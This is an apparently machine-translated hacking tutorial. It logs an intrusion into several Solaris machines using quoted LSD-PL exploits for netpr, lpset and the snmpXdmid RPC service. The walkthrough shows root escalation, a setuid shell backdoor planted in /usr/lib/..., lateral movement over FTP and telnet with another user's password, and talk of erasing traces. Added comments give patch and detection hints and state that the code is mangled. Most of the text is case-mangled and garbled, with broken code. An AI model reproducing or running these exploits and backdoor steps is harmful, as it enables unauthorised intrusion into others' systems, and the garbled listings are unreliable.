UNIX intrusion process (2)
/*
 * Transcript of a Dec 1999 LSD-PL local root exploit for the setuid Solaris
 * 2.7 SPARC binary /usr/lib/lp/bin/netpr, kept here as a historical listing.
 * This copy was case-mangled and lost its escapes ("/ x20" was "\x20"),
 * operators and loop bounds when it was pasted, so it does not compile as
 * shown.  Defender notes: the target presumably copies a command-line
 * argument into a fixed-size stack buffer (not visible here - confirm against
 * the vendor advisory); the fix is the vendor patch or removing the setuid
 * bit, and Solaris of this era could additionally refuse to run code on the
 * stack (noexec_user_stack in /etc/system).  Because the exploit runs locally
 * as an unprivileged user, process accounting / auditing of unexpected netpr
 * executions and the "/usr/lib/..." backdoor left behind in the transcript
 * are the practical detection points.
 *
 * The defines give the filler-word count, the return-address count and the
 * byte alignment; shellcode[] is the SPARC payload, with the original
 * per-instruction notes surviving as the mangled "/ * ... * /" fragments, and
 * it ends with the path of the shell it is meant to start.
 */
/ * ## CopyRight Last Stage Of Delirium Dec 1999 Poland *: //lsd-pl.net/ # * / / * ## / usr / lib / lp / bin / netpr # * / / * Requires to Specify The Address of A host with 515 port opened * / #define NOPNUM 4000 #define adrnum 1200 #define allign 3 char shellcode [] = "/ x20 / xbf / xff / xff" / * BN, A
* /
"/ X20 / XBF / XFF / XFF" / * BN, A
* /
"/ X7F / XFF / XFF / XFF" / * CALL
* /
"/ x90 / x03 / xe0 / x20" / * add% o7, 32,% o0 * /
"/ x92 / x02 / x20 / x10" / * add% o0, 16,% o1 * /
"/ XC0 / X22 / X20 / X08" / * ST% G0, [% O0 8] * /
"/ xd0 / x22 / x20 / x10" / * ST% O0, [% O0 16] * /
"/ XC0 / X22 / X20 / X14" / * ST% G0, [% O0 20] * /
"/ x82 / x10 / x20 / x0b" / * mov 0xb,% g1 * /
"/ x91 / xd0 / x20 / x08" / * ta 8 * /
"/ bin / ksh"
;
/*
 * Two-instruction stub that main() calls as a function; per its own notes it
 * returns %sp, which main() uses as the base for its address estimate.
 */
Char jump [] =
"/ x81 / xc3 / xe0 / x08" / * jmp% O7 8 * /
"/ x90 / x10 / x00 / x0e" / * MOV% SP,% o0 * /
;
/* Four-byte filler instruction repeated by the loops in main(). */
Static char NOP [] = "/ x80 / x1c / x40 / x11";
/*
 * Builds one environment variable and an oversized "-p" argument, then
 * replaces this process with the setuid netpr via execle().
 * Detection hint: the target is started with argv[0] = "LSD" and a "-p"
 * argument several thousand bytes long; both stand out in process accounting
 * or BSM audit records.
 * The "For (i = 0; i" lines are truncated in this transcript (their bounds
 * and bodies are missing) and the '+' operators on the address line were
 * dropped, so the listing is not usable as-is.
 */
Main (int Argc, char ** argv) {
Char Buffer [10000], ADR [4], * B, * ENVP [2];
INT I;
Printf ("Copyright Last Stage Of Delirium Dec 1999 Poland //LSD-PL.NET//N");
Printf ("/ usr / lib / lp / bin / netpr solaris 2.7 sparc / n / n");
/* The single argument is the print server host (port 515 must be reachable, per the header). */
IF (argc == 1) {
Printf ("USAGE:% S lpserver / n", argv [0]);
EXIT (-1);
}
/* Stack address estimate: jump() returns %sp, fixed offsets are added (operators lost in the copy). */
* (UNSIGNED Long *) ADR) = (* (unsigned long (*) ()) jump) () 7124 2000;
/* The environment handed to netpr is a single variable, "xxx=", assembled in buffer[0..]. */
Envp [0] = & buffer [0];
ENVP [1] = 0;
B = & buffer [0];
Sprintf (b, "xxx =");
B = 4;
For (i = 0; i <1 4 - (Strlen (Argv [1])% 4); i ) * b = 0xFF; for (i = 0; i
For (i = 0; i
* b = 0;
/* Second string, from buffer[5000], becomes the "-p" argument below. */
B = & buffer [5000];
For (i = 0; i
For (i = 0; i
* b = 0;
/* Replaces the process image with the setuid target; argv[0] is the literal "LSD". */
Execle ("/ USR / LIB / LP / BIN / NETPR", "LSD", "- I", "BZZ-Z", "- U", "X! X", "- D", Argv [1] ,
"-p", & buffer [5000], "/ bin / sh", 0, eNVP);
}
^ D (*** Here is the end of the Ctrl D, you can use VI to write, FTP, RCP and other uploads can also be. ***)
(*** source program at http://lsd-pl.net/files/get?solaris/solsparc_netpr ***)
$ Ls -al / tmp (*** View Test.c is built ***)
Total 1330
DRWXRWXRWT 7 Sys Sys 1049 JUL 4 19:07.
Drwxrwxrwx 35 root root 1024 jun 29 16:52..
DRWXRWXR-X 2 root root 176 May 4 14:39 .x11-PIPE
DRWXRWXR-X 2 root root 176 May 4 14:39 .x11-unix
DRWXRWXRWX 2 root root 179 May 4 14:39 .pcmcia
Drwxrwxrwx 2 root other 181 JUN 20 13:18.removable
Drwxrwxrwt 2 root root 327 May 4 14:39.rpc_door
-rwxrwxr-x 1 root other 614 May 8 11:17 enctest.class
-rw ------- 1 root other 265936 May 4 14:40 DTDBCACHE_: 0
-rw ------- 1 Render9 Render 0 May 8 11:42 Mpcraohb
-rw ------- 1 Render9 Render 0 May 8 13:02 Mptwagyf
-rw-rw-r - 1 root sys 5248 May 4 14:39 PS_DATA
-rw-rw-r - 1 root other 0 jun 20 13:18 sdtvolcheck399
-rw-r - r - 1 root Other 4 May 4 14:39 SpecKeysd.lock
-rw-rw-r - 1 delex staff 2019 JUL 4 19:10 Test.c
-rw-rw-r - 1 root sys 326236 May 7 11:30 UPS_DATA
$ GCC -O Test Test.c (*** is generally compiled with this way, more information, please see the help ***)
$ ./Test
Copyright last stage of delirium dec 1999 poland //lsd-pl.net/
/ usr / lib / lp / bin / netpr Solaris 2.7 sparcusage: ./test lpserver
$ ./Test localhost
Copyright last stage of delirium dec 1999 poland //lsd-pl.net/
/ usr / lib / lp / bin / netpr Solaris 2.7 SPARC
# Id
UID = 1035 (Delex) GID = 20 (STAFF) EUID = 0 (ROOT) (*** successfully obtained root ***)
# MKDIR / USR / LIB / ...
# Cp / bin / ksh /usr/lib/... / (*** is a simple back door ***)
# Chmod S /USR/LIB/...
# Cat / etc / hosts (*** Take a look at how big this network ***)
########################################################################################################################################################################################################################################################################################################
## GIPS LIMITED Server Hosts Names
## 2001-03-01 (Develop)
########################################################################################################################################################################################################################################################################################################
127.0.0.1 Localhost Loghost
########################################################################################################################################################################################################################################################################################################
## Gipex (Internal - Citic Back-End)
192.168.2.1 Office-i2 Gate-Citic-Backend
192.168.2.5 Render1 Render1-I1
########################################################################################################################################################################################################################################################################################################
## GIPEX (Internal - Citic Office)
192.168.1.11 Office-i1 Gate-Citic-Office
########################################################################################################################################################################################################################################################################################################
## GIPEX (Internal - Ilink)
192.168.100.1 Backup-I1 Gate-ILINK-VPN
## .2 - .9
192.168.100.10 WWW1-I1
192.168.100.11 DB1 DB1-I1 WWW0-I1 www0 www0.xxwex.com
192.168.100.12 SNAP1
## .13
192.168.100.14 SNAP2
192.168.100.15 SNAP3
192.168.100.16 WWW2-I1 MAIL-I1
192.168.100.17 WWW2-I2 MAIL-I2
192.168.100.18 Render2 Render2-I1
192.168.100.19 Render2-I2
## .20 - .252
192.168.100.253 Switch1
## .254
# / Usr / sbin / ping 192.168.100.253
ICMP Host Unreachable from Gateway Wc-sf1.kage.NET (210.76.87.2)
For ICMP from develop (192.168. 0.2) to WWW1-I1 (192.168.100.253)
ICMP Host Unreachable from Gateway Wc-sf1.kage.NET (210.76.87.2)
For ICMP from develop (192.168.0.2) to WWW1-I1 (192.168.100.253)
ICMP host unreachable from getway wc-sf1.kage.net (210.76.87.2) for ICMP from development (192.168.0.2) to WWW1-I1 (192.168.100.253)
^ C (*** LAN is connected ***)
#
------------------------------------------------ Test -------------------------------------------------- ----------------
I will slowly get my internal Internet.
Now go back to take this SunOS 5.6.
------------------------------------------------ Test -------------------------------------------------- ----------------
# Cat> lpset.c (*** source program at http://lsd-pl.net/files/get?solaris/solsparc_lpset ***)
/*
 * Transcript of an Apr 2000 LSD-PL local root exploit for the setuid
 * /usr/bin/lpset on Solaris 2.6/2.7 SPARC.  As with the netpr listing above,
 * escapes ("/ x20" for "\x20"), operators and loop bounds were lost in the
 * paste and the code does not compile as shown.  Defender notes: same class
 * of bug (presumably an argument copied into a fixed stack buffer - confirm
 * against the vendor advisory), same remedies: vendor patch, or drop the
 * setuid bit from lpset if the LP subsystem is not used; local execution of
 * lpset by ordinary users with a multi-kilobyte "-a" argument is the thing
 * to audit for.
 *
 * nopnum / adrnum / allign: filler-word count, return-address count, byte
 * alignment.  shellcode[] is the same SPARC payload as in the netpr listing,
 * ending with the path of the shell it starts.
 */
/ * ## Copyright Last Stage of Delirium Apr 2000 Poland *: //lsd-pl.net/ # * /
/ * ## / usr / bin / lpset # * /
#define nopnum 864
#define adrnum 132
#define allign 3
Char shellcode [] =
"/ X20 / XBF / XFF / XFF" / * BN, A
* /
"/ X20 / XBF / XFF / XFF" / * BN, A
* /
"/ X7F / XFF / XFF / XFF" / * CALL
* /
"/ x90 / x03 / xe0 / x20" / * add% o7, 32,% o0 * /
"/ x92 / x02 / x20 / x10" / * add% o0, 16,% o1 * /
"/ XC0 / X22 / X20 / X08" / * ST% G0, [% O0 8] * /
"/ xd0 / x22 / x20 / x10" / * ST% O0, [% O0 16] * /
"/ XC0 / X22 / X20 / X14" / * ST% G0, [% O0 20] * /
"/ x82 / x10 / x20 / x0b" / * mov 0xb,% g1 * /
"/ x91 / xd0 / x20 / x08" / * ta 8 * /
"/ bin / ksh"
;
/* Stub called from main() to obtain %sp (see its own notes). */
Char jump [] =
"/ x81 / xc3 / xe0 / x08" / * jmp% O7 8 * /
"/ x90 / x10 / x00 / x0e" / * MOV% SP,% o0 * /
;
/* Four-byte filler instruction used by the loops in main(). */
Static char NOP [] = "/ x80 / x1c / x40 / x11";
/*
 * Assembles a single oversized string in buffer[] and passes it as the "-a"
 * argument of the setuid lpset via execle(), with an empty environment.
 * Detection hint: argv[0] is the literal "LSD" and "-a" carries kilobytes of
 * data - neither occurs in legitimate lpset use.
 * Four "For (i = 0; i" lines are truncated in this transcript and the '+'
 * operators on the address line are missing; line 151 also merges two
 * printf calls into one broken statement.
 */
Main (int Argc, char ** argv) {
Char buffer [10000], ADR [4], * B;
INT I;
Printf ("Copyright Last Stage of Delirium Apr 2000 Poland //LSD-PL.NET//n" :printf ("/r/bin/lpset for Solaris 2.6 2.7 SPARC / N / N ");
/* Stack address estimate from jump() (%sp) plus fixed offsets; operators lost in the copy. */
* (UNSIGNED Long *) ADR) = (* (unsigned long (*) ()) jump) () 10088 400;
/* The whole argument starts with "xxx=" and is built in place. */
B = buffer;
Sprintf (b, "xxx =");
B = 4;
For (i = 0; i <2; i ) * b = 0xFF;
For (i = 0; i
For (i = 0; i
For (i = 0; i
For (i = 0; i
* b = 0;
/* Replaces the process with the setuid target; both the argv terminator and envp are 0. */
Execle ("/ USR / BIN / LPSET", "LSD", "- N", "XFN", "- A", Buffer, "Printer", 0, 0);
}
^ D
# Gcc -o lpset lpset.c
/ bin / ksh: GCC: Not found
# Exit
$ Gcc -o lpset lpset.c
$ Ls -al
Total 1410
DRWXRWXRWT 7 SYS SYS 1236 JUL 4 20:33.
Drwxrwxrwx 35 root root 1024 jul 4 19:15 ..
DRWXRWXR-X 2 root root 176 May 4 14:39 .x11-PIPE
DRWXRWXR-X 2 root root 176 May 4 14:39 .x11-unix
DRWXRWXRWX 2 root root 179 May 4 14:39 .pcmcia
Drwxrwxrwx 2 root other 181 JUN 20 13:18.removable
Drwxrwxrwt 2 root root 327 May 4 14:39.rpc_door
-rwxrwxr-x 1 root other 614 May 8 11:17 enctest.class
-rw ------- 1 root other 265936 May 4 14:40 DTDBCACHE_: 0
-rwxrwxr-x 1 delex staff 8572 JUL 4 20:33 lpset
-rw-rw-r - 1 delex staff 1685 JUL 4 20:32 lpset.c
-rw ------- 1 Render9 Render 0 May 8 11:42 Mpcraohb
-rw ------- 1 Render9 Render 0 May 8 13:02 Mptwagyf
-rw-rw-r - 1 root sys 5248 May 4 14:39 PS_DATA
-rw-rw-r - 1 root other 0 jun 20 13:18 sdtvolcheck399
-rw-r - r - 1 root Other 4 May 4 14:39 SpecKeysd.lock
-rwxrwxr-x 1 delex staff 8916 Jul 4 19:13 Test
-rw-rw-r - 1 delex staff 2019 JUL 4 19:10 Test.c-rw-rw-r - 1 root sys 326236 May 7 11:30 UPS_DATA
$ Ftp 192.168.0.3
Connected to 192.168.0.3.
220 dev01 FTP Server (SunOS 5.6) Ready.
Name (192.168.0.2:delex): Tong
331 Password Required for tong.
PASSWORD:
230 User tong logged in.
FTP> CD / TMP
250 CWD Command Successful.
FTP> bin (*** Set up the upload mode is binary ***)
200 Type Set to I.
FTP> PUT LPSET
200 Port Command Successful.
150 Binary Data Connection for LPSET (192.168.0.2, 49105).
226 Transfer Complete.
Local: lpset Remote: lpset
8572 BYTES SENT IN 0.00054 Seconds (15617.71 kbytes / s)
FTP> by
221 Goodbye.
$ Telnet 192.168.0.3
Trying 192.168.0.3 ...
Connected to 192.168.0.3.
Escape Character is '^]'.
Sunos 5.6
Login: Tong
PASSWORD:
Last Login: Wed Jul 4 20:31:37 from 192.168.0.2
Sun Microsystems Inc. Sunos 5.6 Generic August 1997
You have mail.
$ / TMP / LPSET
/ TMP / LPSET: Cannot EXECUTE
$ CHMOD 755 / TMP / LPSET
$ / TMP / LPSET
Copyright last stage of delirium apr 2000 poland //lsd-pl.net/
/ usr / bin / lpset for Solaris 2.6 2.7 SPARC
# Id
UID = 107 (tong) GID = 10 (STAFF) EUID = 0 (*** Hoho ~ Didn't die? ***)
#mkdir / usr / lib / ...
#CP / bin / ksh /usr/lib/...
#CHMOD S /USR/LIB/...
#exit
$ EXIT
Connection Closed by Foreign Host. (*** No, footprint does not rub ***)
$ EXIT
Lost connection to the host.
C: />
------------------------------------------------ Test -------------------------------------------------- ----------------
Oh, why not do it? Disconnected? Don't even rub the footprint?
Hey, brothers, now 21:00, but also to take the subway. Originally 20:30, you will go, continue tomorrow, can't manage so much. Let's go back to see me before.
The tutorial, how to rub the PP. In order to save the layout, this tutorial will not show PP, you have to know how to wipe it. :) Right, learn from the use of remote overflow tomorrow, then find a few redhat back.
Go back, your stomach is also hungry, see you tomorrow ~~
ZZZZZZZZZ ~~~~~~~~
the next day:
Hey, everyone is good morning ~
I am going to work today, I have to be assigned, I will ask.
Shot ...
True, assigned tasks.
However, it started from next week. :)
So I will write the tutorial today.
I don't know if I can write this tutorial today.
We continue. :)
Yesterday covered local privilege escalation; today we will talk about remote overflows.
Almost every operating system has had a serious remote overflow vulnerability.
Commonly known ones:
RPC.TTDBServerd from Solaris 2.3, 2.4, 2.5, 2.5.1, 2.6
RPC.cmsd from Solaris 2.5, 2.5.1, 2.6, 7
SADMIND of Solaris 2.6, 7
SNMPXDMID of Solaris 7, 8
RedHat 6.0, 5.1, 4.0 AMD
RPC.Statd of Redhat 6.2, 6.1, 6.0
Redhat 7.0 LPRNG
...
Other systems are not listed.
Besides the operating system itself, some third-party programs also have problems.
For example, the common FTP server wu-ftpd, version 2.6.0 and below, has serious remote overflow issues.
For example, the DNS server BIND, version 8.2.2 and below, has a serious remote overflow problem.
...
It is too much to take advantage of it, and you need to take time, you need to rely on experience.
After the experience is rich, invade a simple system, just get the other party's system version, then scan the port is enough. Because you have already
The weaknesses of the system and daemon have been well understood.
We tried to enter a machine of Solaris 8 this time.
------------------------------------------------ Test -------------------------------------------------- ----------------
C: /> Telnet 192.168.0.2
Sunos 5.7
Login: Login: Delex
PASSWORD:
*********************************************************** *******
# The jrun is now replaced by jserv
# To restart the servlet server, please use
Rs.sh
# However, As The Jserv Will Reload Those Classes
# INSIDE The "/ usr / proj / gipex / class", you JUST
#Need to remove the old class with the new one.
*********************************************************** *******
$ W
9:21 AM UP 61 Day (s), 18:42, 2 Uses, Load Average: 0.03, 0.04, 0.05
User tty login @ iDLE JCPU PCPUWHAT
Root console 4MAY0162DAYS 2 2 / USR / DT / BIN / SDT_SHELL-C? u
Root PTS / 4 FRI 4PM 6DAYS TAIL -F SYSLOG
Delex PTS / 6 9:21 AM W
$ ls -al / usr / lib / ...
Total 202
DRWXRWXR-X 2 Root Staff 512 JUL 5 10:22.
Drwxrwxr-x 46 root bin 10240 Jul 4 19:21 ..
-R-SR-SR-X 1 Root Staff 91668 JUL 5 10:22 .x
$ ID
UID = 1035 (delex) GID = 20 (STAFF)
$ /Usr/lib/...x (*** running the local back door left yesterday, get root permissions ***)
# Id
UID = 1035 (Delex) GID = 20 (STAFF) EUID = 0 (root)
# CD / TMP
# Ls -al (*** Yesterday's procedure forgot to delete, walk too hast, don't know if it is not there ***)
Total 1410
DRWXRWXRWT 7 SYS SYS 1236 JUL 5 10:20.
Drwxrwxrwx 35 root root 1024 jul 4 19:15 ..
DRWXRWXR-X 2 root root 176 May 4 14:39 .x11-Pipe
DRWXRWXR-X 2 root root 176 May 4 14:39 .x11-unix
DRWXRWXRWX 2 root root 179 May 4 14:39 .pcmcia
Drwxrwxrwx 2 root other 181 JUN 20 13:18.removable
Drwxrwxrwt 2 root root 327 May 4 14:39.rpc_door
-rwxrwxr-x 1 root other 614 May 8 11:17 enctest.class
-rw ------- 1 root other 265936 May 4 14:40 DTDBCACHE_: 0
-rwxrwxr-x 1 delex staff 8572 JUL 4 20:33 lpset (*** hoho ~ **)
-rw-rw-r - 1 delex staff 1685 JUL 4 20:32 lpset.c
-rw ------- 1 Render9 Render 0 May 8 11:42 Mpcraohb
-rw ------- 1 Render9 Render 0 May 8 13:02 Mptwagyf
-rw-rw-r - 1 root sys 5248 May 4 14:39 PS_DATA
-rw-rw-r - 1 root other 0 jun 20 13:18 sdtvolcheck399
-rw-r - r - 1 root Other 4 May 4 14:39 SpecKeysd.lock
-rwxrwxr-x 1 delex staff 8916 Jul 4 19:13 Test
-rw-rw-r - 1 delex staff 2019 JUL 4 19:10 Test.c
-rw-rw-r - 1 root sys 326236 May 7 11:30 UPS_DATA
# Cat> snmp.c (*** source program at http://lsd-pl.net/files/get?solaris/solsparc_snmpxdmid ***)
#include
#include
#include
#include
#include
#include
#include
#include
#include
/*
 * Transcript of the Mar 2001 LSD-PL remote exploit for the Solaris 7/8
 * snmpXdmid daemon: RPC program 100249, version 1, procedure 0x101
 * ("addcomponent").  Like the listings above it lost escapes and operators
 * in the paste and does not compile as shown.
 * Defender notes: snmpXdmid is part of the DMI subsystem; if DMI is not
 * needed, disable it rather than leave an RPC service listening, otherwise
 * apply the vendor patch and keep portmapper/RPC ports off untrusted
 * networks.  On the wire, an ADDCOMPONENT call carrying ~130 KB of
 * name/pragma data (see main) from a client that presents AUTH_UNIX uid 0
 * credentials is not legitimate DMI traffic and is a usable IDS signature.
 */
#define snmpxdmid_prog 100249
#define snmpxdmid_vers 0x1
#define snmpxdmid_addcomponent 0x101
/*
 * First-stage SPARC payload.  main() patches the connection's local TCP port
 * into it at byte offsets 12+2 / 12+3, which suggests it locates the
 * exploit's own connection among the server's descriptors (the original
 * per-instruction notes survive as the mangled "/ * ... * /" fragments;
 * NOTE(review): the exact system calls used are not recoverable from this
 * copy - confirm against the original source if needed).
 */
Char findsckcode [] =
"/ X20 / XBF / XFF / XFF" / * BN, A
* /
"/ X20 / XBF / XFF / XFF" / * BN, A
* /
"/ X7F / XFF / XFF / XFF" / * CALL
* /
"/ x33 / x02 / x12 / x34"
"/ Xa0 / X10 / X20 / XFF" / * MOV 0xFF,% l0 * /
"/ xa2 / x10 / x20 / x54" / * mov 0x54,% l1 * /
"/ XA4 / X03 / XFF / XD0" / * Add% O7, -48,% L2 * /
"/ XAA / X03 / XE0 / X28" / * add% O7, 40,% L5 * /
"/ x81 / xc5 / x60 / x08" / * jmp% L5 8 * /
"/ XC0 / X2B / XE0 / X04" / * STB% G0, [% O7 4] * /
"/ XE6 / X03 / XFF / XD0" / * LD [% O7-48],% L3 * /
"/ XE8 / X03 / XE0 / X04" / * LD [% O7 4],% L4 * /
"/ xa8 / xa4 / xc0 / x14" / * SUBCC% L3,% L4,% L4 * /
"/ X02 / XBF / XFF / XFB" / * BZ
* /
"/ XAA / X03 / XE0 / X5C" / * Add% O7, 92,% L5 * /
"/ XE2 / X23 / XFF / XC4" / * ST% L1, [% O7-60] * /
"/ XE2 / X23 / XFF / XC8" / * ST% L1, [% O7-56] * /
"/ Xe4 / X23 / XFF / XCC" / * ST% L2, [% O7-52] * /
"/ x90 / x04 / x20 / x01" / * add% L0, 1,% o0 * /
"/ Xa7 / X2C / X60 / X08" / * SLL% L1, 8,% L3 * /
"/ x92 / x14 / xe0 / x91" / * OR% L3, 0x91,% O1 * /
"/ x94 / x03 / xff / xc4" / * add% O7, -60,% o2 * / "/ x82 / x10 / x20 / x36" / * MOV 0x36,% G1 * /
"/ x91 / xd0 / x20 / x08" / * ta 8 * /
"/ x1a / xbf / xff / xf1" / * BCC
* /
"/ xa0 / xa4 / x20 / x01" / * Deccc% l0 * /
"/ x12 / xbf / xff / xf5" / * BNE
* /
"/ Xa6 / x10 / x20 / x03" / * MOV 0x03,% L3 * /
"/ x90 / x04 / x20 / x02" / * add% l0, 2,% o0 * /
"/ x92 / x10 / x20 / x09" / * MOV 0x09,% o1 * /
"/ X94 / X04 / XFF / XFF" / * Add% L3, -1,% O2 * /
"/ x82 / x10 / x20 / x3e" / * MOV 0x3e,% g1 * /
"/ Xa6 / X84 / XFF / XFF" / * AddCC% L3, -1,% L3 * /
"/ x12 / xbf / xff / xfb" / * BNE
* /
"/ x91 / xd0 / x20 / x08" / * ta 8 * /
;
/*
 * Second-stage payload, the same shell-starting code as in the local
 * exploits above; this copy has line 387 fused from two source lines.
 */
Char shellcode [] =
"/ X20 / XBF / XFF / XFF" / * BN, A
* /
"/ X20 / XBF / XFF / XFF" / * BN, A
* /
"/ X7F / XFF / XFF / XFF" / * CALL
* /
"/ x90 / x03 / xe0 / x20" / * add% o7, 32,% o0 * /
"/ x92 / x02 / x20 / x10" / * add% o0, 16,% o1 * /
"/ XC0 / X22 / X20 / X08" / * ST% G0, [% O0 8] * /
"/ xd0 / x22 / x20 / x10" / * s "/ xc0 / x22 / x20 / x14" / * ST% G0, [% O0 20] * /
"/ x82 / x10 / x20 / x0b" / * MOV 0x0b,% g1 * /
"/ x91 / xd0 / x20 / x08" / * ta 8 * /
"/ bin / ksh"
;
/* Four-byte filler instruction used by the loops in main(). */
Static char NOP [] = "/ x80 / x1c / x40 / x11";
/*
 * Body of the ADDCOMPONENT request as this client encodes it: two
 * variable-length byte arrays, "name" and "pragma", each as (len, val).
 * The ';' after each member was lost in the transcript.
 */
Typedef struct {
Struct {UNSIGNED INT LEN; Char * Val;} Name
Struct {unsigned int Len; char * val;} pragma
} REQ_T;
/*
 * Hand-written XDR encoder for the ADDCOMPONENT argument.
 * It emits fixed placeholder fields (a u_long, a null pointer, booleans)
 * around the two arrays from req_t.  Both xdr_array() calls use ~0 as the
 * maximum element count, i.e. the client imposes no length limit at all; a
 * server that trusts the wire length and copies into a fixed buffer is the
 * kind of bug this request is built to reach (inferred - the server side is
 * not on this page).  Defender takeaway: XDR/RPC servers must bound every
 * array length themselves, the client-side maximum is not a control.
 * The doubled "xdr_array (xdr_Array (" on two lines is a transcription
 * artifact.
 * Returns TRUE on success, FALSE as soon as any encode step fails.
 */
BOOL_T XDR_REQ (XDR * XDRS, Req_t * Objp) {
Char * v = null; unsigned long L = 0; int b = 1; if (! xdr_u_long (xdrs, & l)) Return (false);
IF (! xdr_pointer (xdrs, & v, 0, (xdrproc_t) null) Return (false);
IF (! XDR_BOOL (XDRS, & B)) Return (False);
IF (! XDR_U_LONG (XDRS, & L)) Return (false);
IF (! XDR_BOOL (XDRS, & B)) Return (False);
/* "name": unbounded byte array. */
IF (! xdr_array (xdr_Array (xDRS, & objP-> name.val, & objp-> name.len, ~ 0, sizeof (char),
(xDrProc_t) xdr_char)) Return (false);
IF (! XDR_BOOL (XDRS, & B)) Return (False);
/* "pragma": unbounded byte array. */
IF (! xdr_array (xdr_Array (xdrs, & objp-> pragma.val, & objp-> pragma.len, ~ 0, sizeof (char),
(xDrProc_t) xdr_char)) Return (false);
IF (! xdr_pointer (xdrs, & v, 0, (xdrproc_t) null) Return (false);
IF (! XDR_U_LONG (XDRS, & L)) Return (false);
Return (TRUE);
}
/*
 * Exploit driver: connects to snmpXdmid over TCP RPC, sends one oversized
 * ADDCOMPONENT request, and if the server does not reply normally, keeps
 * using the same socket as an interactive channel (stdin -> socket,
 * socket -> stdout).
 * Usage per the message below: address, optional -p port, and -v 7|8 to
 * select the Solaris release (the build-specific constants differ).
 * Observable from the defender's side: an RPC client to program 100249
 * presenting AUTH_UNIX uid 0 from "localhost", a ~130 KB ADDCOMPONENT
 * argument, and shell commands ("uname -a" first) flowing over what began as
 * an RPC session.
 * Several lines lost '+' operators and loop bounds in this transcript and
 * line 446 is garbled; treat the listing as non-compilable.
 */
Main (int Argc, char ** argv) {
Char Buffer [140000], Address [4], PCH [4], * B;
INT I, C, N, VERS = -1, port = 0, SCK;
Client * Cl; Enum CLNT_STAT STAT;
Struct hostent * hp;
Struct SockAddr_in ADR;
/* RPC call timeout of 10 s; the exploit treats a missing reply as success (see below). */
Struct TimeValTM = {10,0};
REQ_T REQ;
Printf ("Copyright Last Stage of Delirium Mar 2001 Poland //LSD-PL.NET//N");
Printf ("SNMPXDMID for Solaris 2.7 2.8 SPARC / N / N");
IF (argc <2) {
Printf ("USAGE:% s address [-P port] -V 7 | 8 / n", argv [0]);
EXIT (-1);
}
/* Options start after the address in argv[1]. */
While ((c = getopt (argc-1, & argv [1], "p:"))! = - 1) {
Switch (c) {
Case 'P': port = atoi (OPTARG); Break;
Case 'V': VERS = ATOI (OPTARG);
}
}
/* Build-specific constants for the two supported releases; anything else aborts. */
Switch (VERS) {
Case 7: * (unsigned int *) address = 0x000b1868;
Case 8: * (unsigned int *) address = 0x000cf2c0; break;
DEFAULT: EXIT (-1);
}
/* Derives the two 4-byte values repeated through the request (operators lost in the copy). */
* (unsigned long *) PCH = HTONL (* (unsigned int *) Address 32000);
* (unsigned long *) address = htonl (* (unsigned int *) Address 64000 32000);
Printf ("ADR = 0x% 08X Timeout =% D", NTOHL (* (unsigned long *) address, tm.tv_sec);
/* Target may be given as a dotted quad or a hostname. */
Fflush (stdout); adr.sin_family = af_INet;
ADR.sin_port = HTONS (port);
IF ((adr.sin_addr.s_addr = inet_addr (argv [1])) == - 1) {
IF ((hp = gethostByname) == null) {
Errno = EADDRNOTAVAIL; PERROR ("error"); exit (-1);
}
Memcpy (& adj to_addr.s_addr, hp-> h_addr, 4);
}
/* TCP RPC client; with port 0 clnttcp_create() asks the remote portmapper for the service port. */
SCK = RPC_Anysock;
IF (! (CL = CLNTTCP_CREATE (& ADR, SNMPXDMID_PROG, SNMPXDMID_VERS, & SCK, 0, 0))) {
CLNT_PCREATEERROR ("Error"); exit (-1);
}
/*
 * AUTH_UNIX credentials claiming uid 0 / gid 0 on "localhost".  AUTH_UNIX is
 * unverified by design, so the server cannot tell this from a real root
 * client - one reason never to authorize on it, and an easy log signature.
 */
Cl-> cl_auth = authunix_create ("localhost", 0, 0, 0, null);
/* Recover the local port of the connection; the ioctl path looks like a STREAMS fallback - TODO confirm. */
i = sizeof (struct sockaddr_in);
IF (GetSockName (STRUCT SOCKADDR *) & ADR, & I) == - 1) {
Struct {UNSIGNED INT MAXLEN; UNSIGNED INT LEN; CHAR * BUF;} NB;
IOCTL (SCK, (('s' << 8) | 2), "sockmod");
Nb.maxlen = 0xfffff;
nb.len = sizeof (struct sockaddr_in) ;;
Nb.buf = (char *) & ADR;
IOCTL (SCK, (('T' << 8) | 144), & nb);
}
n = ntoHS (adr.sin_port);
Printf ("Port =% D Connected!", N); FFLUSH (stdout);
/* Patch the local port (big-endian) into the first-stage payload; the '+' in the index was lost. */
FINDSCKCODE [12 2] = (Unsigned Char) ((N & 0xFF00) >> 8);
FINDSCKCODE [12 3] = (unsigned char) (N & 0xFF);
/* "name" array: repeated copies of the two 4-byte values. */
B = & buffer [0];
For (i = 0; i <1248; i ) * b = pch [i% 4];
For (i = 0; i <352; i ) * b = address [i% 4];
* b = 0;
/* "pragma" array from buffer[10000]: zeros, then filler words, then the two payloads (last two loops truncated here). */
B = & buffer [10000];
For (i = 0; i <64000; i ) * b = 0;
For (i = 0; i <64000-188; i ) * b = NOP [I% 4];
For (i = 0; i
For (i = 0; i
* b = 0;
/* Lengths as sent (operators lost): roughly 1.6 KB of name and 128 KB of pragma - the size alone is anomalous. */
Req.name.len = 1200 400 4;
Req.name.val = & buffer [0];
Req.pragma.len = 128000 4;
Req.pragma.val = & buffer [10000];
/* A normal RPC reply means the server survived the request, i.e. it is not affected. */
Stat = CLNT_CALL (Cl, SNMPXDMID_ADDComponent, XDR_Req, & Req, XDR_VOID, NULL, TM);
IF (stat == rpc_success) {Printf ("/ Nerror: not vulnerable / n"); exit (-1);} printf ("Sent! / N");
/* From here the RPC socket is treated as a command channel. */
Write (SCK, "/ bin / uname -a / n", 14);
/* Relay loop: stdin -> socket, socket -> stdout, until either side closes. */
While (1) {
FD_SET FDS;
FD_ZERO (& FDS);
FD_SET (0, & fds);
FD_SET (SCK, & FDS);
IF (SELECT (FD_SETSIZE, & FDS, NULL, NULL, NULL) {
int CNT;
Char BUF [1024];
IF (fd_isset (0, & fds)) {
IF ((CNT = Read (0, BUF, 1024)) <1) {
IF (errno == ewouldblock || errno == eagain) Continue;
Else Break;
}
Write (SCK, BUF, CNT);
}
IF (fd_isset (SCK, & FDS)) {
IF ((CNT = Read (SCK, BUF, 1024) <1) {
IF (errno == ewouldblock || errno == eagain) Continue;
Else Break;
}
Write (1, BUF, CNT);
}
}
}
}
^ D